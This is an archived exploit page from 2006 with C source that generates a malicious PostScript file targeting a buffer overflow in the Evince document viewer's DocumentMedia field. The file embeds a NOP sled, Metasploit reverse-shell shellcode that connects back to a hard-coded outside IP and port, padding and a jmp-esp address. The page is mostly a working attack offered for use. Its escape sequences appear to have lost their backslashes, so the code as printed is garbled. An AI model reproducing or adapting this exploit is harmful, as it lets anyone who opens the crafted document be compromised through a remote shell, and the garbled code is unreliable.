Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit
# Published : 2006-11-28
# Author : K-sPecial
# Previous Title : ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
# Next Title : XMPlay 3.3.0.4 (PLS) Local/Remote Buffer Overflow Exploit

/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow (20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
char cb[] =
"x31xdbx53x43x53x6ax02x6ax66x58x89xe1xcdx80x93x59"
"xb0x3fxcdx80x49x79xf9x5bx5ax68x43x4cx6bx0ex66x68"
"x15xb3x43x66x53x89xe1xb0x66x50x51x53x89xe1x43xcd"
"x80x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
"x89xe1xb0x0bxcdx80";

// location of "jmp *%esp"
char jmpesp[] = "x77xe7xffxff";

int main (int argc, char **argv) {
	FILE *fh;

	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		printf("%s <file.ps>nn", *(argv));
		printf("[-] unable to open file '%s' for writing: %sn", *(argv+1), strerror(errno));
		exit(1);
	}

	fputs("%!PS-Adobe-3.0n", fh);
	fputs("%%Title: hello.psn", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)n", fh);
	fputs("%%BoundingBox: 24 24 588 768n", fh);
	fputs("%%DocumentMedia: ", fh);
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	fwrite(cb, strlen(cb), 1, fh);

	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	fwrite(jmpesp, 4, 1, fh);
	fwrite("xe9x02xffxffxff", 5, 1, fh);

	fputc('n', fh);

	fputs("%%DocumentData: Clean7Bitn", fh);
	fputs("%%Orientation: Landscapen", fh);
	fputs("%%Pages: 1n", fh);
	fputs("%%PageOrder: Ascendn", fh);
	fputs("%%+ encoding ISO-8859-1Encodingn", fh);
	fputs("%%EndCommentsn", fh);

	return(0);
}

// www.Syue.com [2006-11-28]